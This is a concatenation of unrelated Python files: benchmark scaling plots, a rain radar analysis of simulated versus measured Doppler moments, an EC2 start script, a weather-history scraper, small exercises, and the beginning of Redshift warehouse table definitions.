    Lines containing "AVX512" are parsed: nTH<t>_nEV<e> entries go to the
    multithreading series, nJOB<j> entries to the multiprocessing series;
    the second whitespace field is the throughput value.
    """
    (inputfile, outputfile, graph_label) = argv[1:4]

    re_mt = re.compile(r"nTH(?P<th>\d+)_nEV(?P<ev>\d+)")
    re_mp = re.compile(r"nJOB(?P<job>\d+)")

    mt = {}
    mp = {}
    # `with` guarantees the file is closed (was an unclosed open/close pair).
    with open(inputfile) as f:
        for line in f:
            if not "AVX512" in line:
                continue
            comp = line.split(" ")
            m = re_mt.search(comp[0])
            if m:
                if m.group("th") != m.group("ev"):
                    raise Exception("Can't handle yet different numbers of threads (%s) and events (%s)" % (m.group("th"), m.group("ev")))
                mt[int(m.group("th"))] = float(comp[1])
                continue
            m = re_mp.search(comp[0])
            if m:
                mp[int(m.group("job"))] = float(comp[1])

    # BUG fix: `mt.keys() + mp.keys()` is Python-2-only (dict views cannot be
    # added in Python 3); a set union works on both.
    ncores = sorted(set(mt) | set(mp))
    mt_y = [mt[n] for n in ncores]
    mp_y = [mp[n] for n in ncores]
    # Per-core throughput of the smallest run defines ideal linear scaling.
    ideal1 = mt_y[0]/ncores[0]
    ideal1_mp = mp_y[0]/ncores[0]
    makePlot(outputfile+"_throughput", ncores,
             [mt_y, mp_y],
             "Throughput (events/s)",
             title=graph_label,
             legends=["Multithreading", "Multiprocessing"],
             ideal1=ideal1,
             bounds=dict(ymin=0, xmin=0),
             legendYmax=0.5
    )
    # BUG fix: xrange does not exist in Python 3; range is valid in both.
    eff = [mt_y[i]/mp_y[i] for i in range(len(ncores))]
    makePlot(outputfile+"_efficiency", ncores,
             [eff],
             "Multithreading efficiency (MT/MP)",
             title=graph_label,
             bounds=dict(ymin=0.9, ymax=1.1)
    )
    eff_vs_ideal_mt = [mt_y[i]/(ideal1*n) for i, n in enumerate(ncores)]
    eff_vs_ideal_mp = [mp_y[i]/(ideal1*n) for i, n in enumerate(ncores)]
    makePlot(outputfile+"_efficiency_ideal", ncores,
             [eff_vs_ideal_mt, eff_vs_ideal_mp],
             "Efficiency wrt. ideal",
             title=graph_label,
             legends=["Multithreading", "Multiprocessing"],
             bounds=dict(ymin=0.8, ymax=1.01, xmax=65),
             legendYmax=0.9
    )
    speedup_mt = [mt_y[i]/ideal1 for i in range(len(ncores))]
    speedup_mp = [mp_y[i]/ideal1 for i in range(len(ncores))]
    makePlot(outputfile+"_speedup", ncores,
             [speedup_mt, speedup_mp],
             "Speedup wrt. 1 thread",
             title=graph_label,
             legends=["Multithreading", "Multiprocessing"],
             ideal1=1,
             bounds=dict(ymin=0, xmin=0),
             legendYmax=0.5
    )
if __name__ == "__main__":
    # Usage: script <inputfile> <outputfile-basename> <graph-title>
    main(sys.argv)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 27 12:12:41 2019
@author: dori
"""
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('..')
from READ import slice_data
from READ import read_variables
from statistic import hist_and_plot
from air_properties import FooteduToit_coeff
from scipy.special import gamma
# Mass-size relation m(D) = a * D**b for spherical water drops:
# a = rho * pi/6 with rho the density of water, b = 3.
rho = 1000.0
a = rho*np.pi/6.0
b = 3.0
def mD(D):
    """Mass of a spherical water drop of diameter D."""
    return a*D**b
def Dm(m):
    """Inverse of mD: diameter of a drop of mass m."""
    return (m/a)**(1/b)
# Shape parameters of the assumed modified-gamma size distribution (nu, mu)
# and their mass-space counterparts (mup, gam) via the m(D) power law.
nu=0.0
mu=1.0/3.0
gam = b*mu
mup = b*nu + b - 1.0
# Fall-speed parameterizations: power law v = av*D**bv and an Atlas-type
# relation v = alpha - beta*exp(-ctilde*D).
# NOTE(review): units/source of these coefficients are not shown here --
# presumably SI; confirm against the fall-speed literature the authors use.
av = 114.0137
bv = 0.23437
alpha = 9.292
beta = 9.623
ctilde = 622.2
rho_w = 1000.0
# ctilde converted from size space to mass space through the m(D) relation.
c = ctilde*(6.0/(np.pi*rho_w))**mu
def lam(N, q):
    """Slope parameter of the mass-space gamma distribution from number (N) and mass (q) concentration."""
    return (N*gamma((nu+2)/mu)/(q*gamma((nu+1)/mu)))**mu
def A(N, lam):
    """Intercept parameter of the mass-space gamma distribution."""
    return N*mu*lam**((nu+1)/mu)/gamma((nu+1)/mu)
def LAM(lam):
    """Mass-space slope converted to size (diameter) space via m = a*D**b."""
    return lam*a**mu
def N0(A):
    """Mass-space intercept converted to size (diameter) space."""
    return A*b*a**(nu+1)
def MkN(N0, LAM, k):
    """k-th moment of the size-space distribution."""
    return N0*gamma((mup+k+1)/gam)/(gam*LAM**((mup+k+1)/gam))
def Mkf(A, lam, k):
    """k-th moment of the mass-space distribution."""
    return A*gamma((nu+k+1)/mu)/(mu*lam**((nu+k+1)/mu))
def qN2Dm(q, N):
    """Mean mass-weighted diameter Dm = M4/M3 (size space) from mass q and number N."""
    ll = lam(N, q)
    AA = A(N, ll)
    LL = LAM(ll)
    NN = N0(AA)
    return MkN(NN, LL, 4)/MkN(NN, LL, 3)
def qN2MDVp(q, N):
    """Mean Doppler velocity for the power-law fall speed, weighted by the
    2nd mass moment (m**2 ~ D**6, i.e. Rayleigh reflectivity).
    Negative sign: downward velocities are reported negative -- presumably
    the radar convention used by the plots; confirm there.
    """
    ll = lam(N, q)
    AA = A(N, ll)
    return -av*Mkf(AA, ll, 2+bv)/Mkf(AA, ll, 2)
def qN2SWp(q, N):
    """Doppler spectrum width sqrt(E[v^2]-E[v]^2) for the power-law fall speed."""
    ll = lam(N, q)
    AA = A(N, ll)
    mdv = -qN2MDVp(q, N)
    return np.sqrt(av*av*Mkf(AA, ll, 2+2*bv)/Mkf(AA, ll, 2) - mdv*mdv)
def qN2MDVa(q, N):
    """Mean Doppler velocity for the Atlas-type fall speed; the exponential
    factor exp(-c*m**mu) appears as a slope shift ll -> ll+c in the moment.
    """
    ll = lam(N, q)
    AA = A(N, ll)
    return -(alpha - beta*Mkf(AA, ll+c, 2)/Mkf(AA, ll, 2))
def qN2SWa(q, N):
    """Doppler spectrum width for the Atlas-type fall speed."""
    ll = lam(N, q)
    AA = A(N, ll)
    mdv = -qN2MDVa(q, N)
    return np.sqrt(alpha*alpha + beta*(-2*alpha*Mkf(AA, ll+c, 2) + beta*Mkf(AA, ll+2*c, 2))/Mkf(AA, ll, 2) - mdv*mdv)
def qN2SKa(q, N):
    """Doppler spectrum skewness (3rd standardized moment) for the Atlas-type fall speed."""
    ll = lam(N, q)
    AA = A(N, ll)
    mdv = -qN2MDVa(q, N)
    sw = qN2SWa(q, N)
    M3 = alpha**3*Mkf(AA, ll, 2) - 3*alpha**2*beta*Mkf(AA, ll+c, 2) + \
        3*alpha*beta**2*Mkf(AA, ll+2*c, 2) - beta**3*Mkf(AA, ll+3*c, 2)
    return M3/(sw**3*Mkf(AA, ll, 2)) - 3*mdv/sw - (mdv/sw)**3
def qN2moments(q, N):
    """Return (MDV, SW, SK) for the power-law fall speed in one pass."""
    ll = lam(N, q)
    AA = A(N, ll)
    M2 = Mkf(AA, ll, 2)
    M2_b = Mkf(AA, ll, 2+bv)
    mdv = av*M2_b/M2
    M2b_2 = Mkf(AA, ll, 2*bv+2)
    sw = np.sqrt(av**2*M2b_2/M2 - mdv*mdv)
    M2_3b = Mkf(AA, ll, 2+3*bv)
    sk = av**3*M2_3b/(sw**3*Mkf(AA, ll, 2)) - 3*mdv/sw - (mdv/sw)**3
    return -mdv, sw, sk
def Matrosov17(DDV): # Ka-W
    """Rain Dm estimate from the Ka-W dual-wavelength velocity difference,
    after Matrosov (2017); NaN outside the fitted range (DDV >= 2.4).
    Note: negative DDV intentionally falls through to the cubic branch,
    matching the original piecewise definition.
    """
    if 0.0 <= DDV <= 1:
        return 0.47 + 0.49 * DDV ** 0.54
    if DDV < 2.4:
        # Horner form of the cubic fit.
        return 1.338 + DDV * (-0.977 + DDV * (0.678 - DDV * 0.079))
    return np.nan
vMatrosov17 = np.vectorize(Matrosov17)
def Kamil19(DDV): # X-W
    """Rain Dm estimate from the X-W dual-wavelength velocity difference
    (quintic polynomial fit, evaluated in Horner form)."""
    result = 0.0
    for coef in (0.009, -0.108, 0.451, -0.779, 0.905, 0.576):
        result = result * DDV + coef
    return result
# ---- Load ICON, Pluvio and MRR precipitation series, resample to accMins ----
accMins = 5
freq = str(accMins)+'min'  # accumulation window, e.g. '5min'
iconfile = 'data/precipitation_icon.h5'
icon = pd.read_hdf(iconfile, key='stat')
# Drop duplicated timestamps, keeping the most recent entry for each.
icon = icon.reset_index().drop_duplicates(subset='index',
                                          keep='last').set_index('index')
pluviofile = 'data/precipitation_pluvio.h5'
pluvio = pd.read_hdf(pluviofile, key='stat')
mrrfile = 'data/precipitation_mrr.h5'
mrr = pd.read_hdf(mrrfile, key='stat')
mrr = mrr.resample(freq).apply(np.nansum)
ixi = pd.date_range(start='2015-11-11', end='2016-1-4', freq='9s')
# NOTE(review): reindex returns a new frame; this result is discarded and
# `icon` is left unchanged -- likely intended icon = icon.reindex(ixi).
icon.reindex(ixi)
icon = icon.resample(freq).apply(np.nansum)
ixp = pd.date_range(start='2015-11-11', end='2016-1-4', freq='1min')
# NOTE(review): same discarded-result pattern as above for pluvio.
pluvio.reindex(ixp)
pluvio = pluvio.resample(freq).apply(np.nansum)
pamtra = read_variables(path='/work/develop/pamtraICON/comparison/data/pamtra/',
hydroset='all_hydro', suffix='pamtra_icon.h5',
pamtra=True, minhour=6.0,
varlist=['Z10', 'Z35', 'Z94', 'W10', 'W35', 'W94',
'T', 'unixtime', 'P', 'RH', 'QNR', 'QR',
'QG', 'QI', 'QS', 'QH', 'QC', 'S35',
'V10', 'V35', 'V94'])
pamtra['Q'] = pamtra['QR']+pamtra['QG']+pamtra['QI']+pamtra['QS']+pamtra['QH']+pamtra['QC']
pamtra['R/Q'] = pamtra['QR']/pamtra['Q']
#ice = read_variables(path='/work/develop/pamtraICON/comparison/data/pamtra/',
# hydroset='only_ice', suffix='pamtra_icon.h5', pamtra=True,
# varlist=['Z10', 'Z35', 'Z94', 'T',
# 'V10', 'V35', 'V94', 'unixtime',
# 'W10', 'W35', 'W94'], minhour=6.0)
#
#snow = read_variables(path='/work/develop/pamtraICON/comparison/data/pamtra/',
# hydroset='only_snow', suffix='pamtra_icon.h5', pamtra=True,
# varlist=['Z10', 'Z35', 'Z94', 'T',
# 'V10', 'V35', 'V94', 'unixtime',
# 'W10', 'W35', 'W94'], minhour=6.0)
radar = read_variables(path='/work/develop/pamtraICON/comparison/data/radar/',
hydroset='', suffix='radar_regrid.h5', minhour=6.0,
varlist=['Z10', 'Z35', 'Z94', 'T', 'P', 'RH',
'V10avg', 'V35avg', 'V94avg', 'W10', 'W35', 'W94',
'unixtime', 'quality_x', 'quality_w'])
radar.unixtime = pd.to_datetime(radar.unixtime.astype(np.int64), unit='s')
pamtra.unixtime = pd.to_datetime(pamtra.unixtime.astype(np.int64), unit='s')
radar['RR'] = (pluvio.resample('1s').nearest().loc[radar.unixtime]*60/accMins).values
pamtra['RR'] = (icon.resample('1s').nearest().loc[pamtra.unixtime]*60/accMins).values
#radarw = slice_data(radar, 'quality_w', maxvalue=8192)
#radarx = slice_data(radar, 'quality_x', maxvalue=8192)
pamtra = slice_data(pamtra, 'Z35', -15.0)
radar = slice_data(radar, 'Z35', -15.0)
logrule = True
density = False
CFAD = True
inverty = True
bins = 100
stats = ['mean', 'median', 'quartile', 'decile']
## High precipitation
minRR = 1.0
maxRR = 91.0
pre = 'HIG'
mdv, sw, sk = qN2moments(pamtra['QR'], pamtra['QNR'])
pamtra['MDVp'] = mdv
pamtra['SWp'] = sw
pamtra['SKp'] = sk
pamtra['MDVa'] = qN2MDVa(pamtra['QR'], pamtra['QNR'])
pamtra['SWa'] = qN2SWa(pamtra['QR'], pamtra['QNR'])
pamtra['SKa'] = qN2SKa(pamtra['QR'], pamtra['QNR'])
f, ((ax11, ax12), (ax21, ax22), (ax31, ax32)) = plt.subplots(3, 2, figsize=(10.5, 9.))
r = hist_and_plot(slice_data(pamtra, 'RR', minvalue=minRR, left=True),
'Simulated MDV Ka',
yvar='T', xvar='V35',
xlabel='MDV [m/s]', ylabel='T [deg C]',
vminmax=[0.1, 30],
xlim=[-10, 0], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax11), stats=stats,
bins=bins, density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, left=True),
'Measured MDV Ka',
yvar='T', xvar='V35avg',
xlabel='MDV [m/s]', ylabel='T [deg C]',
vminmax=[0.1, 30],
xlim=[-10, 0], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax12), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, left=True),
'Measured SW Ka',
yvar='T', xvar='W35',
xlabel='SW [m/s]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax22), stats=stats,
bins=(np.linspace(0, 3), np.linspace(0, 10)),
density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(pamtra, 'RR', minvalue=minRR, left=True),
'Simulated SW Ka',
yvar='T', xvar='W35',
xlabel='SW [m/s]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax21), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
radar['Dm1'] = vMatrosov17((radar['V94avg']-radar['V35avg'])/FooteduToit_coeff(radar['P'], radar['T']+273.15, radar['RH']))
radar['Dm2'] = Kamil19((radar['V94avg']-radar['V10avg'])/FooteduToit_coeff(radar['P'], radar['T']+273.15, radar['RH']))
pamtra['Dm'] = qN2Dm(pamtra['QR'], pamtra['QNR'])*1000.0
pamtra.loc[pamtra.QNR < 1, 'Dm'] = np.nan
pamtra['Dm1'] = vMatrosov17((pamtra['V94']-pamtra['V35'])/FooteduToit_coeff(pamtra['P'], pamtra['T']+273.15, pamtra['RH']))
pamtra['Dm2'] = Kamil19((pamtra['V94']-pamtra['V10'])/FooteduToit_coeff(pamtra['P'], pamtra['T']+273.15, pamtra['RH']))
# Discard non-physical negative retrieved diameters.
# BUG fix: the original `radar.loc[mask]['Dm1'] = ...` is pandas chained
# assignment -- it writes into a temporary copy and leaves `radar` unchanged.
# Single-step .loc[mask, column] assigns in place (same form as used for
# pamtra['Dm'] above).
radar.loc[radar['Dm1'] < 0.0, 'Dm1'] = np.nan
radar.loc[radar['Dm2'] < 0.0, 'Dm2'] = np.nan
r = hist_and_plot(slice_data(pamtra,
'RR', minvalue=minRR, left=True),
'Simulated Dm rain',
yvar='T', xvar='Dm',
xlabel='Dm [mm]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax31), stats=stats,
bins=bins, density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, left=True),
'Retrieved Dm rain',
yvar='T', xvar='Dm2',
xlabel='Dm [mm]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax32), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
f.suptitle('T-MDV CFADs RR>1 mm/h', fontsize=12, fontweight='heavy', y=0.99)
f.tight_layout(pad=1.5, h_pad=0.5, w_pad=0.5)
f.text(x=0.5, y=0.66, s='T-SW CFADs', fontsize=12, fontweight='heavy',
horizontalalignment='center')
f.text(x=0.5, y=0.33, s='T-Dm CFADs', fontsize=12, fontweight='heavy',
horizontalalignment='center')
f.savefig(pre+'pamRad_T_VSD.png', dpi=300)
## Low precipitation
minRR = -1.0
maxRR = 1.0
pre = 'LOW'
f, ((ax11, ax12), (ax21, ax22), (ax31, ax32)) = plt.subplots(3, 2, figsize=(10.5, 9.))
r = hist_and_plot(slice_data(pamtra, 'RR', minvalue=minRR, maxvalue=maxRR),
'Simulated MDV Ka',
yvar='T', xvar='V35',
xlabel='MDV [m/s]', ylabel='T [deg C]',
vminmax=[0.1, 30],
xlim=[-10, 0], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax11), stats=stats,
bins=bins, density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, maxvalue=maxRR),
'Measured MDV Ka',
yvar='T', xvar='V35avg',
xlabel='MDV [m/s]', ylabel='T [deg C]',
vminmax=[0.1, 30],
xlim=[-10, 0], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax12), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, maxvalue=maxRR),
'Measured SW Ka',
yvar='T', xvar='W35',
xlabel='SW [m/s]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax22), stats=stats,
bins=(np.linspace(0, 3), np.linspace(0, 10)),
density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(pamtra, 'RR', minvalue=minRR, maxvalue=maxRR),
'Simulated SW Ka',
yvar='T', xvar='W35',
xlabel='SW [m/s]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax21), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(pamtra,#slice_data(pamtra, 'R/Q', minvalue=0.8),
'RR', minvalue=minRR, maxvalue=maxRR),
'Simulated Dm rain',
yvar='T', xvar='Dm',
xlabel='Dm [mm]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax31), stats=stats,
bins=bins, density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, maxvalue=maxRR),
'Retrieved Dm rain',
yvar='T', xvar='Dm2',
xlabel='Dm [mm]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax32), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
f.suptitle('T-MDV CFADs RR<1 mm/h', fontsize=12, fontweight='heavy', y=0.99)
f.tight_layout(pad=1.5, h_pad=0.5, w_pad=0.5)
f.text(x=0.5, y=0.66, s='T-SW CFADs', fontsize=12, fontweight='heavy',
horizontalalignment='center')
f.text(x=0.5, y=0.33, s='T-Dm CFADs', fontsize=12, fontweight='heavy',
horizontalalignment='center')
f.savefig(pre+'pamRad_T_VSD.png', dpi=300)
pam = slice_data(pamtra, 'T', minvalue=6)
plt.figure()
plt.scatter(pam.Dm, pam.W35, label='pamtra with Atlas')
plt.scatter(pam.Dm, pam.SWa, label='Atlas')
plt.scatter(pam.Dm, pam.SWp, label='powerLaw')
plt.xlabel('Dm [mm]'); plt.ylabel('SW [m/s]')
plt.grid(); plt.legend()
plt.savefig('SW_Dm_analysis.png')
plt.figure()
plt.scatter(pam.Dm, pam.V35, label='pamtra with Atlas')
plt.scatter(pam.Dm, pam.MDVa, label='Atlas')
plt.scatter(pam.Dm, pam.MDVp, label='powerLaw')
plt.xlabel('Dm [mm]'); plt.ylabel('MDV [m/s]')
plt.grid(); plt.legend()
plt.savefig('MDV_Dm_analysis.png')
plt.figure()
plt.scatter(pam.Dm, pam.S35, label='pamtra with Atlas')
plt.scatter(pam.Dm, pam.SKa, label='Atlas')
plt.scatter(pam.Dm, pam.SKp, label='powerLaw')
plt.ylim([-1,1])
plt.xlabel('Dm [mm]'); plt.ylabel('Skewness')
plt.grid(); plt.legend()
plt.savefig('SK_Dm_analysis.png')
|
import os
import boto3

# BUG fix: `ec2` was referenced but never created.
ec2 = boto3.resource('ec2')

# Start every stopped EC2 instance visible in the default region.
for i in ec2.instances.all():
    if i.state['Name'] == 'stopped':
        i.start()
        # BUG fix: `instance` was an undefined name; report the instance
        # that was just started via the loop variable.
        print("Instance started: ", i.id)
|
import unittest
def split_on_dash(string):
    """Split *string* on '-' characters and return the list of pieces."""
    return string.split('-')
class TestSplitOnDash(unittest.TestCase):
    """Unit test for split_on_dash."""
    def test(self):
        # One dash yields exactly two pieces.
        self.assertEqual(split_on_dash('hi-hi'), ['hi', 'hi'])
if __name__ == '__main__':
    unittest.main()
|
import random
# Word pool (Russian: 'корова' cow, 'правило' rule, 'конфета' candy).
anagramma = ('корова','правило','конфета',)
# Pick one word at random from the pool.
word = random.choice(anagramma)
correct = word
# Build an anagram by repeatedly extracting a random letter from `word`
# until it is empty; `mixed` accumulates the letters in scrambled order.
mixed = ""
while word:
    position = random.randrange(len(word))
    mixed+= word[position]
    word = word[:position] + word[(position + 1):]
print(mixed)
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 24 17:10:58 2020
@author: 59654
"""
import requests
import json
import pandas as pd
import re
from bs4 import BeautifulSoup
def geturl(month, year=2020, station=58457):
    """Build the tianqi.2345.com weather-history JS URL for one month.

    The defaults preserve the original hard-coded behavior (year 2020,
    station 58457 = Hangzhou); *month* is zero-padded to two digits.
    """
    m = '%02d' % month
    return ("http://tianqi.2345.com/t/wea_history/js/{y}{m}/{s}_{y}{m}.js"
            .format(y=year, m=m, s=station))
def getweather(month_start,month_end):
    """Scrape daily weather for 2020 months [month_start, month_end].

    Returns a DataFrame whose columns (in Chinese) are: city, date, high
    temperature, low temperature, weather, wind direction, wind force,
    AQI, air-quality category.
    """
    # Browser-like request headers.
    # BUG fix: these were built but never passed to requests.get, so every
    # request went out without them.
    headers = {}
    headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'
    headers['accept'] = '*/*'
    headers['Connection'] = 'keep-alive'
    headers['Pragma'] = 'no-cache'
    result = []
    for month in range(month_start,month_end+1):
        url = geturl(month)
        res = requests.get(url, headers=headers)
        data=json.dumps(res.text, indent=2,ensure_ascii=False)
        # Crude parse of the JS payload: take the array body, strip quotes,
        # and split each {...} record into whitespace-separated fields.
        b=res.text.split('[')
        c=b[1].replace('"','')
        f=re.findall(r'\{(.*?)\}', str(c))
        for i in f[:-1]:
            i={i.replace("'",'')}
            xx= re.sub("[A-Za-z\!\%\[\]\,\。]", " ", str(i))
            yy=xx.split(' ')
            # data[24:26] holds the city name; the yy offsets are tied to the
            # fixed record layout of the scraped JS -- fragile by design.
            result.append([data[24:26], yy[3][1:], yy[10][1:-1], yy[17][1:-1], yy[24][1:], yy[34][1:],yy[41][1:], yy[45][1:],yy[53][1:]])
    weather=pd.DataFrame(result)
    weather.columns=['城市',"日期","最高气温","最低气温","天气","风向",'风力','空气质量指数','空气质量']
    return weather
def getweathercsv(month_start,month_end):
    """Scrape daily weather for 2020 months [month_start, month_end] and
    write it to a UTF-8-BOM CSV named <city><start>月_<end>月.csv."""
    # Browser-like request headers.
    # BUG fix: these were built but never passed to requests.get.
    headers = {}
    headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'
    headers['accept'] = '*/*'
    headers['Connection'] = 'keep-alive'
    headers['Pragma'] = 'no-cache'
    result = []
    for month in range(month_start,month_end+1):
        url = geturl(month)
        res = requests.get(url, headers=headers)
        data=json.dumps(res.text, indent=2,ensure_ascii=False)
        # Crude parse of the JS payload; see getweather for the layout notes.
        b=res.text.split('[')
        c=b[1].replace('"','')
        f=re.findall(r'\{(.*?)\}', str(c))
        for i in f[:-1]:
            i={i.replace("'",'')}
            xx= re.sub("[A-Za-z\!\%\[\]\,\。]", " ", str(i))
            yy=xx.split(' ')
            result.append([data[24:26], yy[3][1:], yy[10][1:-1], yy[17][1:-1], yy[24][1:], yy[34][1:],yy[41][1:], yy[45][1:],yy[53][1:]])
    weather=pd.DataFrame(result)
    weather.columns=['城市',"日期","最高气温","最低气温","天气","风向",'风力','空气质量指数','空气质量']
    # NOTE(review): `data` here is whatever the last loop iteration left --
    # a NameError if the month range is empty.
    weather.to_csv(str(data[24:26])+str(month_start)+'月_'+str(month_end)+'月.csv',encoding="utf_8_sig")
# getweather(1,8)
def getweather_onemonth(month):
    """Scrape daily weather for one 2020 month and return it as a DataFrame
    (same Chinese column layout as getweather)."""
    # Browser-like request headers.
    # BUG fix: these were built but never passed to requests.get.
    headers = {}
    headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'
    headers['accept'] = '*/*'
    headers['Connection'] = 'keep-alive'
    headers['Pragma'] = 'no-cache'
    result = []
    url = geturl(month)
    res = requests.get(url, headers=headers)
    data=json.dumps(res.text, indent=2,ensure_ascii=False)
    # Crude parse of the JS payload; see getweather for the layout notes.
    b=res.text.split('[')
    c=b[1].replace('"','')
    f=re.findall(r'\{(.*?)\}', str(c))
    for i in f[:-1]:
        i={i.replace("'",'')}
        xx= re.sub("[A-Za-z\!\%\[\]\,\。]", " ", str(i))
        yy=xx.split(' ')
        result.append([data[24:26], yy[3][1:], yy[10][1:-1], yy[17][1:-1], yy[24][1:], yy[34][1:],yy[41][1:], yy[45][1:],yy[53][1:]])
    weather=pd.DataFrame(result)
    weather.columns=['城市',"日期","最高气温","最低气温","天气","风向",'风力','空气质量指数','空气质量']
    return weather
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the workbook function below.
def workbook(n, k, arr):
    """Count 'special' problems: those whose within-chapter number equals
    the page they are printed on.

    n   -- number of chapters (arr carries the data; n is unused here)
    k   -- maximum problems per page
    arr -- problems per chapter, printed in order, each chapter starting
           on a fresh page
    """
    special = 0
    page = 1
    for chapter_problems in arr:
        problem = 1
        while problem <= chapter_problems:
            # Problems [problem, last_on_page] share the current page.
            last_on_page = min(problem + k - 1, chapter_problems)
            if problem <= page <= last_on_page:
                special += 1
            problem = last_on_page + 1
            page += 1
    return special
if __name__ == '__main__':
    # HackerRank harness: read n, k and the per-chapter problem counts from
    # stdin, write the answer to the file named by OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    nk = input().split()
    n = int(nk[0])  # number of chapters
    k = int(nk[1])  # maximum problems per page
    arr = list(map(int, input().rstrip().split()))
    result = workbook(n, k, arr)
    fptr.write(str(result) + '\n')
    fptr.close()
|
import configparser
# CONFIG
config = configparser.ConfigParser()
config.read('dwh.cfg')
# DROP TABLES
staging_events_table_drop = "DROP TABLE IF EXISTS staging_events"
staging_songs_table_drop = "DROP TABLE IF EXISTS staging_songs"
songplay_table_drop = "DROP TABLE IF EXISTS songplays"
user_table_drop = "DROP TABLE IF EXISTS users"
song_table_drop = "DROP TABLE IF EXISTS songs"
artist_table_drop = "DROP TABLE IF EXISTS artists"
time_table_drop = "DROP TABLE IF EXISTS time"
# CREATE TABLES
staging_events_table_create= ("""CREATE TABLE staging_events(
event_id INT IDENTITY(0,1) PRIMARY KEY,
artist_name VARCHAR(50),
auth VARCHAR(50),
first_name VARCHAR(255),
gender VARCHAR(1),
item_in_session INTEGER,
last_name VARCHAR(50),
song_length FLOAT,
level VARCHAR(50),
location VARCHAR,
method VARCHAR,
page VARCHAR,
registration FLOAT,
session_id BIGINT,
song_title VARCHAR,
status INTEGER,
ts BIGINT,
user_agent VARCHAR,
user_id VARCHAR)
""")
staging_songs_table_create = ("""CREATE TABLE staging_songs(
song_id VARCHAR PRIMARY KEY,
num_songs INTEGER,
artist_id VARCHAR(100),
latitude FLOAT,
longitude FLOAT,
location VARCHAR(255),
name VARCHAR(50),
title VARCHAR(255),
duration FLOAT,
year INTEGER)
""")
songplay_table_create = ("""CREATE TABLE songplays(
songplay_id INT IDENTITY(1,1) PRIMARY KEY,
start_time TIMESTAMP REFERENCES time(start_time),
user_id VARCHAR REFERENCES users(user_id),
level VARCHAR(50),
song_id VARCHAR REFERENCES songs(song_id),
artist_id VARCHAR REFERENCES artists(artist_id),
session_id BIGINT,
location VARCHAR(255),
user_agent TEXT)
""")
user_table_create = ("""CREATE TABLE users(
user_id VARCHAR PRIMARY KEY,
first_name VARCHAR,
last_name VARCHAR,
gender VARCHAR(1),
level VARCHAR(50))
""")
song_table_create = ("""CREATE TABLE songs(
song_id VARCHAR PRIMARY KEY,
title VARCHAR,
artist_id VARCHAR NOT NULL,
year INTEGER,
duration FLOAT)
""")
artist_table_create = ("""CREATE TABLE artists(
artist_id VARCHAR PRIMARY KEY,
name VARCHAR,
location VARCHAR,
latitude FLOAT,
longitude FLOAT)
""")
time_table_create = ("""CREATE TABLE time(
start_time TIMESTAMP PRIMARY KEY,
hour INTEGER,
day INTEGER,
week INTEGER,
month INTEGER,
year INTEGER,
weekday INTEGER)
""")
# STAGING TABLES
staging_events_copy = ("""copy staging_events from {}
iam_role {}
region 'us-west-2'
JSON {}""").format(config.get('S3','LOG_DATA'),
